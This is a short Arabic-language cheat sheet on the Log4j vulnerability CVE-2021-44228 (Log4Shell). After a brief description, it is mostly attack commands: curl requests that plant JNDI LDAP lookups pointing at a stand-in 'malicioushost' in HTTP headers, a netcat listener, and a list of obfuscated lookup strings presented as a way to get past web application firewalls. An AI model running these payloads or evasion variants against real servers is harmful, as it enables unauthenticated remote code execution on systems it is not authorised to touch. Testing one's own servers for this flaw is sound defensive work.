
CVE-2021-44228
في 5 ديسمبر 2021، حددت Apache ثغرة أمنية (عُرفت لاحقًا باسم CVE-2021-44228) في خدمة تسجيل Log4j المستخدمة على نطاق واسع. هذه الثغرة، المعروفة أيضًا باسم Log4shell، تتيح للمهاجمين السيطرة الكاملة على الخوادم المتأثرة من خلال السماح بتنفيذ تعليمات برمجية عن بُعد دون مصادقة إذا كان المستخدم يشغّل تطبيقًا يستخدم مكتبة تسجيل Java. Log4j مدمج بشكل كبير في مجموعة واسعة من أطر عمل devops، وأنظمة تكنولوجيا المعلومات المؤسسية، وبرامج البائعين، ومنتجات السحابة.
نفّذ ما يلي على المضيف البعيد الخبيث للتحقق مما إذا كان خادمك عرضة لاستغلال Log4j
curl vulnserver:port -H 'X-Api-Version: ${jndi:ldap://malicioushost:mport/a}'
nc -lnvp mport
يمكن استخدام أشكال أخرى تتضمن طلب HTTP-POST للتحقق من الثغرة
curl -H 'User-Agent: ${jndi:ldap://malicioushost:mport/a}' vulnserver:port
لتجاوز جدار حماية تطبيقات الويب
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}